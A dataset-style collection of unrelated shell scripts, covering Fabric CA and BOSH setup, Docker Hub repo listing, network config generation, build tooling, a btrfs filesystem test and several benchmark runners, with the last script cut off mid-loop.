| 943 | 3.515625 | 4 |
[] |
no_license
|
#!/bin/bash
#
# Configure and start Fabric CA server.
#
# This is a bootstrap script for the Fabric CA docker container,
# see the ../docker-compose-fabric-ca.yaml config.
set -e
SCRIPT_PATH=`dirname $0`
echo $FABRIC_CA_SERVER_HOME
echo $FABRIC_CA_SERVER_CSR_HOSTS
echo $FABRIC_CA_SERVER_CA_NAME
mkdir -p $FABRIC_CA_SERVER_HOME
FABRIC_CA_TEMPLATE=$SCRIPT_PATH/fabric-ca-server-config.yaml
FABRIC_CA_CONFIG=$FABRIC_CA_SERVER_HOME/fabric-ca-server-config.yaml
# Generate the config file
( echo "cat <<EOF >${FABRIC_CA_CONFIG}";
cat ${FABRIC_CA_TEMPLATE};
echo "EOF";
) >$FABRIC_CA_SERVER_HOME/gen.config.sh
. $FABRIC_CA_SERVER_HOME/gen.config.sh
cat ${FABRIC_CA_CONFIG}
# Initialize the root CA
fabric-ca-server init -b $CA_ADMIN_USER:$CA_ADMIN_PASS
# Copy the root CA's signing certificate to the data directory to be used by others
cp $FABRIC_CA_SERVER_HOME/ca-cert.pem $TARGET_CERTFILE
# Start the root CA
fabric-ca-server start
| true |
2e85a30ef3a182a5d048f8692578968ef4ef48fb
|
Shell
|
atsgen/tf-infra-tools
|
/docker-hub/repo-list.sh
|
UTF-8
| 1,569 | 3.859375 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# script to list all the repos, or repos for a given tag in given domain
# Maintainer: [email protected]
#
# new tag with which image needs to be tagged
TAG=''
DOMAIN='atsgen'
# A POSIX variable
OPTIND=1 # Reset in case getopts has been used previously in the shell.
usage() {
echo "$0 Usage: "
echo " -h help"
echo " -t <TAG> for which repos needs to be listed eg. r5.1"
echo " -d <domain> domain eg. atsgen"
}
while getopts "h?t:d:" opt; do
case "$opt" in
h|\?)
usage;
exit 0
;;
t) TAG=$OPTARG
;;
d) DOMAIN=$OPTARG
;;
esac
done
source $(dirname $0)/common/login_token.sh
source $(dirname $0)/common/functions.sh
shift $((OPTIND-1))
[ "${1:-}" = "--" ] && shift
# get list of repositories for domain
get_repos
for i in ${REPO_LIST}
do
if [[ ! -z "$TAG" ]]; then
PTOKEN="$(curl -sSL -u ${UNAME}:${UPASS} "https://auth.docker.io/token?service=registry.docker.io&scope=repository:${DOMAIN}/${i}:pull,push" | jq -r .token)"
MANIFEST=$(curl -s -H "Accept: application/vnd.docker.distribution.manifest.v2+json" -H "Authorization: Bearer ${PTOKEN}" -X GET https://registry.hub.docker.com/v2/${DOMAIN}/${i}/manifests/${TAG})
VERSION=$(echo $MANIFEST | jq -r .schemaVersion)
if [[ ! -z "${VERSION}" && "null" != "$VERSION" ]]; then
echo "${DOMAIN}/${i}"
fi
else
echo "${DOMAIN}/${i}"
fi
done
curl -s -X POST -H "Accept: application/json" -H "Authorization: JWT ${TOKEN}" https://hub.docker.com/v2/logout/ > /dev/null
| true |
86dac3b31f7a4f1849b24fcfb24f2c1ec98bae61
|
Shell
|
subhankarc/rdpg-boshrelease
|
/jobs/rdpgd-service/templates/shell/env.erb
|
UTF-8
| 1,929 | 3.03125 | 3 |
[
"MIT"
] |
permissive
|
#!/var/vcap/packages/bash-4.3/bin/bash
set -e # exit immediately if a simple command exits with a non-zero status
set -u # report the usage of uninitialized variables
jobName="rdpgd-service"
vmName="<%= name %>" # BOSH VM name
vmIndex="<%= index %>" # Index within cluster
deploymentName="<%= spec.deployment %>"
domainName="<%= spec.dns_domain_name %>"
vmFullName="${vmName}/${vmIndex}" # full job name
nodeName="${deploymentName}-${vmName}-${vmIndex}"
logPath="/var/vcap/sys/log/${jobName}"
mkdir -p "${logPath}"
exec &>> "${logPath}/${jobName}.log" # STD{OUT,ERR}
echo -e "$(date +'%Y-%m-%dT%H:%M:%S') $(whoami) > $0 $*"
source /var/vcap/jobs/${jobName}/shell/functions
<% if p('rdpgd_service.debug') == "true" %>turn_debugging_on<% end %>
jobPath="/var/vcap/jobs/${jobName}"
pkgPath="/var/vcap/packages/rdpgd"
runPath="/var/vcap/sys/run/${jobName}"
tmpPath="/var/vcap/sys/tmp/${jobName}"
storePath="/var/vcap/store/${jobName}"
userName="vcap"
groupName="vcap"
LANG="en_US.UTF-8"
HOME="${HOME:-"/home/${userName}"}"
pidFile="${runPath}/${jobName}.pid"
LD_LIBRARY_PATH="${LD_LIBRARY_PATH:-}"
export LANG HOME LD_LIBRARY_PATH
RDPGD_LOG_LEVEL="<%= p('rdpgd_service.log_level') %>"
RDPGD_ADMIN_PORT="<%= p('rdpgd_service.admin_port') %>"
RDPGD_ADMIN_USER="<%= p('rdpgd_service.admin_user') %>"
RDPGD_ADMIN_PASS="<%= p('rdpgd_service.admin_pass') %>"
RDPGD_ADMIN_PG_URI="<%= p('rdpgd_service.admin_pg_uri') %>"
RDPGD_PG_PASS="<%= p('rdpgd_service.db_pass') %>"
RDPGD_PIDFILE=${pidFile}
RDPGD_CLUSTER="<%= p('rdpgd_service.cluster_name') %>"
RDPGD_POOL_SIZE="<%= p('rdpgd_service.pool_size') %>"
RDPGD_PG_PORT="<%= p('pgbdr.port') %>"
RDPGD_PB_PORT="<%= p('pgbouncer.listen_port') %>"
export RDPGD_PIDFILE RDPGD_LOG_LEVEL RDPGD_ADMIN_PORT RDPGD_ADMIN_USER \
RDPGD_ADMIN_PASS RDPGD_ADMIN_PG_URI RDPGD_POOL_SIZE \
RDPGD_PG_PORT RDPGD_PB_PORT RDPGD_PG_PASS RDPGD_CLUSTER
add_packages_to_path
configure_job_paths
set_pid
| true |
827cd5aea9dfb45e470b5735dc2e7df3b8182134
|
Shell
|
todokku/cloudland
|
/scripts/frontend/create_ex.sh
|
UTF-8
| 295 | 2.90625 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
ethcfg=/etc/network/interfaces.d/eth0.cfg
brcfg=/etc/network/interfaces.d/br4090.cfg
cp $ethcfg $brcfg
sed -i "s/eth0/br4090/g" $brcfg
sed -i "/iface br4090 inet/a bridge_ports eth0" $brcfg
ifdown eth0
sed -i "s/static/manual/" $ethcfg
sed -i "3,$ d" $ethcfg
ifup eth0
ifup br4090
| true |
b49dbc7122c4e79601087a6b88bd00b7a205f4b3
|
Shell
|
RK4/HD-CPS_HPCA-22
|
/mst.sh
|
UTF-8
| 1,612 | 2.6875 | 3 |
[] |
no_license
|
#!/bin/bash
export MAIN_DIR=`pwd`
export GALOIS_DIR=$MAIN_DIR/Galois/build/lonestar
export PMOD_DIR=$MAIN_DIR/PMOD/Galois-2.2.1/build/apps
# colors used by the status messages below
green=$(tput setaf 2)
reset=$(tput sgr0)
mkdir -p output
echo "" > output/MST.out
echo "${green}Running MST with RELD${reset}"
echo "Running MST with RELD" >> output/MST.out
$GALOIS_DIR/boruvka/boruvka $MAIN_DIR/datasets/USA-road-dUSA.bin -wl reld -t 40 > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
echo "${green}Running MST with OBIM${reset}"
echo "Running MST with OBIM" >> output/MST.out
$PMOD_DIR/boruvka/boruvka-merge $MAIN_DIR/datasets/USA-road-dUSA.bin -t 40 -wl obim > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
echo "${green}Running MST with PMOD${reset}"
echo "Running MST with PMOD" >> output/MST.out
$PMOD_DIR/boruvka/boruvka-merge $MAIN_DIR/datasets/USA-road-dUSA.bin -t 40 -wl adap-obim > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
echo "${green}Running MST with Minnow-sw${reset}"
echo "Running MST with Minnow-sw" >> output/MST.out
$GALOIS_DIR/boruvka/boruvka $MAIN_DIR/datasets/USA-road-dUSA.bin -wl minn -t 40 > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
echo "${green}Running MST with hdcps${reset}"
echo "Running MST with HD-CPS" >> output/MST.out
$GALOIS_DIR/boruvka/boruvka $MAIN_DIR/datasets/USA-road-dUSA.bin -wl hdcps -t 40 > temp
cat temp | grep 'Elapsed Time' >> output/MST.out
cat temp | grep "PD"| tail -n1 >> output/MST.out
| true |
f34a2acc26cc5b78ad0b8f20c32ac4b13aea557f
|
Shell
|
harper-yang/shell-sample
|
/scripts/第一章之小试牛刀/c.sh
|
UTF-8
| 190 | 3.078125 | 3 |
[] |
no_license
|
#!/bin/bash
declare -A fruit
# define the associative array
fruit=([apple]='111' [orange]='222')
# get a value from the array
echo "apple price = ${fruit[apple]}"
# get the keys of the array
echo "${!fruit[*]}"
| true |
4e08ce8ae60b9ba782ba71df6a66d661597d8061
|
Shell
|
Infinity-James/.dots
|
/.zprofile
|
UTF-8
| 1,324 | 2.75 | 3 |
[] |
no_license
|
# my weird aliases
alias cat="ccat --bg=dark"
alias reddy="redis-server /usr/local/etc/redis.conf"
alias vim="nvim"
alias watchtest="clear && fswatch -o test build | xargs -n1 -I{} npm test"
alias mong="mongod --config /usr/local/etc/mongod.conf"
alias rimraf="rm -rf"
alias ag="ag --color-path \"1;34\" --color-line-number \"3;34\""
alias pizza="node ~/pizza/web_client/getStatus.js"
alias maan="man"
alias maaan="man"
alias maaaan="man"
alias maaaaan="man"
alias maaaaaan="man"
# 3rd party functions
eval $(thefuck --alias)
[[ -s `brew --prefix`/etc/profile.d/z.sh ]] && . `brew --prefix`/etc/profile.d/z.sh
# node stuff
export NODE_REPL_HISTORY_FILE="/Users/will/node_repl.log"
export NVM_DIR="/Users/will/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm
# ruby
source /usr/local/share/chruby/chruby.sh
chruby ruby-2.3
# my functions
mkky () {
if [ ! -z "$1" ]
then
mkdir "$1" && cd "$1"
fi
}
watchy () {
fswatch -0 $1 | xargs -0 -n 1 -I {} $2 {}
}
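# e.g. `watchy src 'make'` runs `make <changed-path>` on each change under src
# (illustrative usage of the fswatch/xargs pipeline above)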
# fzf settings
export FZF_DEFAULT_COMMAND='ag -g ""'
# Git
alias g="git status"
alias gc="git commit -a"
alias gp="git push"
alias gpu="git push origin master"
alias gpl="git pull"
alias gpo="git pull origin master"
alias gl='git log --pretty=format:"[%h] %ae, %ar: %s" --stat'
alias gg='git log --pretty=oneline --graph --all'
| true |
bd26998e270e0e10d31430a2228b849e616952f8
|
Shell
|
cha63506/bosh-softlayer-tools
|
/ci/scripts/bosh-stemcell
|
UTF-8
| 1,224 | 3.109375 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
(
set -e
echo -e "\n Get stemcell version..."
STEMCELL_VERSION=`cat vsphere-stemcell/version`
STEMCELL_VERSION=0000
echo $STEMCELL_VERSION > stemcell-version
s3cmd put stemcell-version s3://bosh-softlayer-cpi-stemcells --access_key=$S3_ACCESS_KEY --secret_key=$S3_SECRET_KEY
echo -e "\n Install vagrant plugins..."
vagrant plugin install vagrant-berkshelf
vagrant plugin install vagrant-omnibus
vagrant plugin install vagrant-aws --plugin-version 0.5.0
echo -e "\n Navigate to vagrant directory..."
cd bosh/bosh-stemcell
echo -e "\n Copy s3cfg to vagrant shared directory..."
cp ../../bosh-softlayer-private/.s3cfg .
echo -e "\n Bring up vagrant stemcell building VM for AWS EC2-Classic..."
vagrant up remote --provider=aws
echo -e "\n Build stemcell, then upload to S3 bucket..."
vagrant ssh -c "
cd /bosh
bundle exec rake stemcell:build[vsphere,esxi,ubuntu,trusty,go,bosh-os-images,bosh-ubuntu-trusty-os-image.tgz]
s3cmd put /bosh/tmp/*.tgz s3://bosh-softlayer-cpi-stemcells -c /vagrant/.s3cfg
" remote
echo -e "\n Terminating VM"
ec2-describe-instances --filter "key-name=bosh" | grep instance | awk '{print $3}' | xargs ec2-terminate-instances
)
| true |
95dbf7ec65913d17b597a6cce1a0cd4b80cb3791
|
Shell
|
UniversitatBarcelonaMathInfo/SOI
|
/2p/je/1ej.sh
|
UTF-8
| 443 | 3.453125 | 3 |
[] |
no_license
|
#!/bin/bash
rm -fr practica2
mkdir practica2
# enter practica2
cd practica2
# create the 5 requested directories
for i in {1..5}
do
mkdir dir_$i
done
# create 10 directories inside dir_1
for i in {1..10}
do
mkdir dir_1/carpeta_$i
done
echo "f" > foo1.txt
echo "f" > foo2.txt
echo "f" > foo.c
echo "f" > README
cp *.txt dir_2
cp foo* dir_3
for i in $(ls)
do
if [ -d $i ];
then
echo "D- $i"
ls $i
else
echo "A- $i"
fi
done
| true |
7893b851c859fff443f295820330389fc864b9e7
|
Shell
|
pv2k/DWDM_Project
|
/Code/cde.sh
|
UTF-8
| 324 | 3.296875 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
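# Assumes pdfminer's pdf2txt.py is available alongside this script (see the
# python call below); PAKDD-3year is the folder of source PDFs.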
c="_text"
i="PAKDD-3year"
j="./Text/"
echo "Opening pdf folder: " $i
echo "pdf_text folder:Text"
mkdir -p Text
for k in ./$i/*.pdf
do
pdfname="$(echo $k | rev | cut -d "/" -f 1 | rev)"
echo $j$pdfname$c
python pdf2txt.py -o "$j$pdfname$c" -t text "$k"
echo "Converting :" $pdfname
done
| true |
4d3da8fee948c18fcfe53fb408663b9065888dfb
|
Shell
|
mvtthxw/Bash_cwiczenia
|
/Tablice.sh
|
UTF-8
| 1,441 | 3.71875 | 4 |
[] |
no_license
|
#!/bin/bash
# Exercise 1
# insertion sort
function zad1(){
tablica=("$@")
n=${#tablica[*]}
for (( i=1;i<$n;i++)); do
j=$i-1
tymczasowe=${tablica[$i]}
while (( $j>=0 && $(echo "${tablica[j]} > ${tymczasowe}" |bc -l) )); do
tablica[$j+1]=${tablica[$j]}
j=$j-1
done
tablica[j+1]=${tymczasowe}
done
echo ${tablica[*]}
}
a=(5 3 2 4 8 1)
zad1 5.6 3 2.4 2.3 4 8 1
#zad1 "${a[@]}"
# Exercise 2
# two-dimensional array filled with random numbers
function zad2(){
#rows: $1
#columns: $2
sprawdz='^[0-9]+$'
declare -A tablica
if ! [[ $1 =~ $sprawdz ]];then
echo "invalid number of rows or columns"
exit -1
elif [[ $1 -le 0 && $2 -le 0 ]]; then
echo "invalid number of rows or columns"
exit -1
else
for (( i=1; i<=$1; i++ )); do
for (( j=1; j<=$2; j++ )); do
liczba=${RANDOM}
tablica[$i,$j]=$(( $liczba%21 ))
done
done
fi
echo "tablica:"
for (( i=1; i<=$1; i++ )); do
for (( j=1; j<=$2; j++ )); do
printf ${tablica[$i,$j]}
printf " "
done
echo
done
}
zad2 $1 $2
function zad3(){
tablica=("$@")
n=${#tablica[*]}
for ((i = 0; i<n; i++)); do
for((j = 0; j<n-i-1; j++)); do
if (( $(echo "${tablica[j]} > ${tablica[$j+1]}" |bc -l) )); then
# swap
tymczasowe=${tablica[$j]}
tablica[$j]=${tablica[$j+1]}
tablica[$j+1]=$tymczasowe
fi
done
done
echo ${tablica[*]}
}
zad3 4.5 3.2 5.6
| true |
02610f2d14e612fa94746b6d6d710e9547e31cb1
|
Shell
|
lavabit/robox
|
/res/scripts/delete.sh
|
UTF-8
| 2,429 | 3.46875 | 3 |
[] |
no_license
|
#!/bin/bash
# Handle self referencing, sourcing etc.
if [[ $0 != $BASH_SOURCE ]]; then
export CMD=$BASH_SOURCE
else
export CMD=$0
fi
# Ensure a consistent working directory so relative paths work.
pushd `dirname $CMD` > /dev/null
BASE=`pwd -P`
popd > /dev/null
ORG="$1"
NAME="$2"
PROVIDER="$3"
VERSION="$4"
if [ -f /opt/vagrant/embedded/bin/curl ]; then
export CURL="/opt/vagrant/embedded/bin/curl"
else
export CURL="curl"
fi
if [ -f /opt/vagrant/embedded/lib64/libssl.so ] && [ -z "$LD_PRELOAD" ]; then
export LD_PRELOAD="/opt/vagrant/embedded/lib64/libssl.so"
elif [ -f /opt/vagrant/embedded/lib64/libssl.so ]; then
export LD_PRELOAD="/opt/vagrant/embedded/lib64/libssl.so:$LD_PRELOAD"
fi
if [ -f /opt/vagrant/embedded/lib64/libcrypto.so ] && [ -z "$LD_PRELOAD" ]; then
export LD_PRELOAD="/opt/vagrant/embedded/lib64/libcrypto.so"
elif [ -f /opt/vagrant/embedded/lib64/libcrypto.so ]; then
export LD_PRELOAD="/opt/vagrant/embedded/lib64/libcrypto.so:$LD_PRELOAD"
fi
export LD_LIBRARY_PATH="/opt/vagrant/embedded/bin/lib/:/opt/vagrant/embedded/lib64/"
# The jq tool is needed to parse JSON responses.
if [ ! -f /usr/bin/jq ]; then
tput setaf 1; printf "\n\nThe 'jq' utility is not installed.\n\n\n"; tput sgr0
exit 1
fi
# Ensure the credentials file is available.
if [ -f $BASE/../../.credentialsrc ]; then
source $BASE/../../.credentialsrc
else
tput setaf 1; printf "\nError. The credentials file is missing.\n\n"; tput sgr0
exit 2
fi
if [ -z ${VAGRANT_CLOUD_TOKEN} ]; then
tput setaf 1; printf "\nError. The vagrant cloud token is missing. Add it to the credentials file.\n\n"; tput sgr0
exit 2
fi
printf "\n\n"
# Assume the position, while you create the version.
#${CURL} \
# --tlsv1.2 \
# --silent \
# --retry 16 \
# --retry-delay 60 \
# --header "Content-Type: application/json" \
# --header "Authorization: Bearer $VAGRANT_CLOUD_TOKEN" \
# "https://app.vagrantup.com/api/v1/box/$ORG/$NAME/versions" \
# --data "
# {
# \"version\": {
# \"version\": \"$VERSION\",
# \"description\": \"A build environment for use in cross platform development.\"
# }
# }
# "
#printf "\n\n"
# Delete the existing provider, if it exists already.
${CURL} \
--silent \
--retry 16 \
--retry-delay 60 \
--header "Authorization: Bearer $VAGRANT_CLOUD_TOKEN" \
--request DELETE \
https://app.vagrantup.com/api/v1/box/$ORG/$NAME/version/$VERSION
printf "\n\n"
| true |
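The script requires jq but the excerpt never invokes it; a hedged sketch of probing the API for the version before issuing the DELETE — the top-level "version" field in the response is an assumption, not confirmed against the Vagrant Cloud docs:

#!/bin/bash
# Hypothetical values; in the real script these arrive as $1..$4.
ORG="myorg"; NAME="mybox"; VERSION="1.0.0"
existing=$(curl --silent \
  --header "Authorization: Bearer $VAGRANT_CLOUD_TOKEN" \
  "https://app.vagrantup.com/api/v1/box/$ORG/$NAME/version/$VERSION" \
  | jq -r '.version // empty')   # empty string when the field is absent
[ -n "$existing" ] && echo "version $existing exists; safe to delete"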
710eabdb3dd28d3d658ab781c003920e27c6b617
|
Shell
|
993639542/shell
|
/ip.sh
|
UTF-8
| 422 | 2.796875 | 3 |
[] |
no_license
|
#!/bin/bash
# randomly generate NIC configuration files
for i in `seq 10`
do
num=$((RANDOM%127+128))
cat > /home/ens$i <<EOF
TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=static
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
IPV6_ADDR_GEN_MODE=stable-privacy
NAME=ens$i
DEVICE=ens$i
ONBOOT=yes
IPADDR=192.168.75.$num
PREFIX=24
GATEWAY=192.168.75.2
DNS1=192.168.75.2
EOF
done
| true |
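RANDOM%127+128 can repeat, so two generated files may collide on the same host octet; a sketch drawing distinct octets with shuf instead (a variation, not the script's original behavior):

#!/bin/bash
# shuf -i permutes the range; -n 10 keeps ten distinct values.
for num in $(shuf -i 128-254 -n 10)
do
echo "192.168.75.$num"
done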
b8a5682c8fb71f5dbc531954495727d463e8d2e7
|
Shell
|
Quantum-Platinum-Cloud/YCSB
|
/vitess/scripts/benchmark-all-clusters.sh
|
UTF-8
| 3,738 | 4 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This script loops through the cluster configurations specified in
# clusters.json, bringing up the cluster as defined and then running
# all the YCSB benchmarks against it, and then pulls the results.
# ensure google cloud project is set
project_id=`gcloud config list project | sed -n 2p | cut -d " " -f 3`
if [ -z "$project_id" ]
then
echo "Project ID not set, use 'gcloud config set project PROJECT' to set it"
exit 1
fi
GKE_ZONE=${GKE_ZONE:-'us-east1-a'} # zone for ycsb-runners, gke cluster
BENCHMARKS_BASE_DIR=${BENCHMARKS_BASE_DIR:-~/ycsb_benchmarks} # where to save results
CLUSTERS_CONFIG=${CLUSTERS_CONFIG:-'cluster-replicas.json'}
WORKLOAD_CONFIG=${WORKLOAD_CONFIG:-'workloads-replicas.json'}
YCSB_RUNNER_NAME=${YCSB_RUNNER_NAME:-'ycsb-runner'}
SKIP_CLUSTER=${SKIP_CLUSTER:-'false'}
function json_to_params() {
json=$1
json=`echo $json | perl -pe "s/(,)(?=(?:[^']|'[^']*')*$)/;/g"` # Replace non quoted , with ;
json=`echo $json | perl -pe "s/: /:/g"` # Remove extra whitespace
json=`echo "${json:1:-1}"` # Get rid of open/close brackets
params=''
for i in `echo $json | tr ";" " "`; do
param_name=`echo $i | cut -f1 -d ':'`
val=`echo $i | cut -f2 -d ':'`
params="$params ${param_name:2:-1}=${val:2:-1}"
done
echo $params
}
git clone https://github.com/youtube/vitess.git
gke_config=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print obj['gke_cluster']"`
gke_params=`json_to_params "$gke_config"`
if ! $SKIP_CLUSTER; then
echo Bringing up k8s cluster
cd vitess/examples/kubernetes
eval $gke_params GKE_ZONE=$GKE_ZONE ./cluster-up.sh 2>&1 | tee cluster-up.txt
cd ../../..
echo k8s cluster is up
fi
num_scenarios=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print len(obj['scenarios'])"`
max_ycsb_runners=0
for i in `seq 0 $(($num_scenarios-1))`; do
num_ycsb_runners=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print obj['scenarios'][$i]['NUM_YCSB_RUNNERS']"`
max_ycsb_runners=$(($num_ycsb_runners > $max_ycsb_runners ? $num_ycsb_runners : $max_ycsb_runners))
done
echo Bringing up $max_ycsb_runners YCSB instances
# Bring up YCSB runners and reuse them for all cluster configurations
for i in `seq 1 $max_ycsb_runners`; do
YCSB_RUNNER_NAME=${YCSB_RUNNER_NAME}$i GKE_ZONE=$GKE_ZONE ./ycsb-runner-up.sh &
done
wait
echo YCSB instances are up
for i in `seq 0 $(($num_scenarios-1))`; do
# Convert json line format into environment variable line format
# e.g. {u'TABLETS_PER_SHARD': u'3', u'SHARDS': u'-80,80-'} becomes
# TABLETS_PER_SHARD=3 SHARDS=-80,80-
config=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print obj['scenarios'][$i]['cluster']"`
params=`json_to_params "$config"`
num_ycsb_runners=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print obj['scenarios'][$i]['NUM_YCSB_RUNNERS']"`
benchmarks_dir=`date +"$BENCHMARKS_BASE_DIR/%Y_%m_%d_%H_%M"`
mkdir -p $benchmarks_dir
# Bring up the cluster
cd vitess/examples/kubernetes
cp cluster-up.txt $benchmarks_dir/cluster-up.txt
eval $params GKE_ZONE=$GKE_ZONE ./vitess-up.sh 2>&1 | tee $benchmarks_dir/vitess-up.txt
cd ../../..
WORKLOAD_CONFIG=$WORKLOAD_CONFIG BENCHMARKS_DIR=$benchmarks_dir GKE_ZONE=$GKE_ZONE NUM_YCSB_RUNNERS=$num_ycsb_runners ./run-all-benchmarks.sh
# Cleanup - tear down the cluster
cd vitess/examples/kubernetes
eval $params GKE_ZONE=$GKE_ZONE ./vitess-down.sh 2>&1 | tee $benchmarks_dir/vitess-down.txt
cd ../../..
done
cd vitess/examples/kubernetes
eval $gke_params ./cluster-down.sh
cd ../../..
rm -rf vitess
for i in `seq 1 $max_ycsb_runners`; do
YCSB_RUNNER_NAME=${YCSB_RUNNER_NAME}$i GKE_ZONE=$GKE_ZONE ./ycsb-runner-down.sh &
done
wait
| true |
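A quick illustration of json_to_params in isolation, assuming the function above has been sourced; the input mirrors the example in the function's own comment:

config="{u'TABLETS_PER_SHARD': u'3', u'SHARDS': u'-80,80-'}"
json_to_params "$config"
# prints: TABLETS_PER_SHARD=3 SHARDS=-80,80-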
96fbaa75f31c317c6ab587334b56b144a7170015
|
Shell
|
kdave/xfstests
|
/tests/btrfs/246
|
UTF-8
| 1,361 | 3.21875 | 3 |
[] |
no_license
|
#! /bin/bash
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2021 SUSE Linux Products GmbH. All Rights Reserved.
#
# FS QA Test 246
#
# Make sure btrfs can create compressed inline extents
#
. ./common/preamble
_begin_fstest auto quick compress
# Override the default cleanup function.
_cleanup()
{
cd /
rm -r -f $tmp.*
}
# Import common functions.
. ./common/filter
# real QA test starts here
_supported_fs btrfs
_require_scratch
# If it's subpage case, we don't support inline extents creation for now.
_require_btrfs_inline_extents_creation
_scratch_mkfs > /dev/null
_scratch_mount -o compress,max_inline=2048
# This should create compressed inline extent
$XFS_IO_PROG -f -c "pwrite 0 2048" $SCRATCH_MNT/foobar > /dev/null
ino=$(stat -c %i $SCRATCH_MNT/foobar)
echo "sha256sum before mount cycle"
sha256sum $SCRATCH_MNT/foobar | _filter_scratch
_scratch_cycle_mount
echo "sha256sum after mount cycle"
sha256sum $SCRATCH_MNT/foobar | _filter_scratch
_scratch_unmount
$BTRFS_UTIL_PROG inspect dump-tree -t 5 $SCRATCH_DEV | \
grep "($ino EXTENT_DATA 0" -A2 > $tmp.dump-tree
echo "dump tree result for ino $ino:" >> $seqres.full
cat $tmp.dump-tree >> $seqres.full
grep -q "inline extent" $tmp.dump-tree || echo "no inline extent found"
grep -q "compression 1" $tmp.dump-tree || echo "no compressed extent found"
# success, all done
status=0
exit
| true |
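For reference, cases in this suite are driven by the harness at the repository root; a typical invocation, with the test devices configured in local.config:

# from the xfstests checkout
./check btrfs/246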
2e44941e5238ac239a219698e2dfbe8fd9fcdbaf
|
Shell
|
warlockza/IBM-Data-Merge-Utility
|
/build/build.sh
|
UTF-8
| 1,381 | 3.296875 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# only run when executed from inside /build dir
if [ -f sample-context.xml ]; then
set -evx
PROJECT_BASE_DIR=$(cd ..; pwd)
# clean generated static sources
rm -rf "$PROJECT_BASE_DIR"/idmu-editor/src/main/resources/META-INF/resources/editor/*
# enter static sources project root
cd "$PROJECT_BASE_DIR"/idmu-editor/src/main/node
# remove the build dir
rm -rf build
# build the static sources
#npm install
#bower install
#gulp fonts-copy-init
#gulp
# copy generated static sources to the path to have them included as part of the webapp at /editor
mkdir -p "$PROJECT_BASE_DIR/idmu-editor/src/main/resources/META-INF/resources/editor"
#cp -R "$PROJECT_BASE_DIR"/idmu-editor/src/main/node/build/* "$PROJECT_BASE_DIR"/idmu-editor/src/main/resources/META-INF/resources/editor/
cp -R "$PROJECT_BASE_DIR"/idmu-editor/src/main/node/bower_components "$PROJECT_BASE_DIR"/idmu-editor/src/main/resources/META-INF/resources/editor/
cp -R "$PROJECT_BASE_DIR"/idmu-editor/src/main/node/src "$PROJECT_BASE_DIR"/idmu-editor/src/main/resources/META-INF/resources/editor/
# build maven ignoring tests
cd "$PROJECT_BASE_DIR"
mvn -DskipTests clean install
cd "$PROJECT_BASE_DIR"/build
else
echo "Need to run from inside the build dir at <idmu_project_dir>/build : "
echo "./build.sh"
fi
| true |
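The marker-file guard above forces callers to cd into build/ first; a common alternative sketch that resolves the script's own directory regardless of the caller's working directory:

#!/bin/bash
# Resolve the directory holding this script, then work from there.
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
cd "$SCRIPT_DIR"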
adec1571811aabc78b758db3556038fcafb45ff8
|
Shell
|
zfruc/smr-simulator
|
/src/private_test.sh
|
UTF-8
| 1,967 | 2.859375 | 3 |
[] |
no_license
|
#!/bin/bash
set -xue
nine=(5582 11164 16746 22328 27910 33492 39074 44656 50238)
one=(5582)
total_ssd=56863
total_fifo=10718
echo "8:16 2048000" > /sys/fs/cgroup/blkio/fo1/blkio.throttle.read_bps_device
echo "8:16 2048000" > /sys/fs/cgroup/blkio/fo1/blkio.throttle.write_bps_device
echo "8:16 10240000" > /sys/fs/cgroup/blkio/fo2/blkio.throttle.read_bps_device
echo "8:16 10240000" > /sys/fs/cgroup/blkio/fo2/blkio.throttle.write_bps_device
rm -rf /dev/shm/*
cgexec -g "blkio:fo1" ./smr-ssd-cache 0 0 0 0 0 $total_ssd $total_fifo 0 0 > part31_user0_global.txt &
cgexec -g "blkio:fo2" ./smr-ssd-cache 1 1 8 0 20000000 $total_ssd $total_fifo 0 0 > part31_user1_global.txt &
wait
for i in "${!nine[@]}"
do
rm -rf /dev/shm/*
first_cache_num=$((total_ssd*i/10))
second_cache_num=$((total_ssd-first_cache_num))
echo $i,$first_cache_num,$second_cache_num
cgexec -g "blkio:fo1" ./smr-ssd-cache 0 0 0 0 0 $total_ssd $total_fifo $first_cache_num 1 > part31_user0_test$i.txt &
cgexec -g "blkio:fo2" ./smr-ssd-cache 1 1 8 0 20000000 $total_ssd $total_fifo $second_cache_num 1 > part31_user1_test$i.txt &
wait
done
total_ssd=55822
total_fifo=10485
rm -rf /dev/shm/*
# note: these values are recomputed here but not used by the global runs below
first_cache_num=$((total_ssd*i/10))
second_cache_num=$((total_ssd-first_cache_num))
cgexec -g "blkio:fo1" ./smr-ssd-cache 0 0 3 0 0 $total_ssd $total_fifo 0 0 > part32_user0_global.txt &
cgexec -g "blkio:fo2" ./smr-ssd-cache 1 1 8 0 20000000 $total_ssd $total_fifo 0 0 > part32_user1_global.txt &
wait
for i in "${!nine[@]}"
do
rm -rf /dev/shm/*
first_cache_num=$((total_ssd*i/10))
second_cache_num=$((total_ssd-first_cache_num))
echo $i,$first_cache_num,$second_cache_num
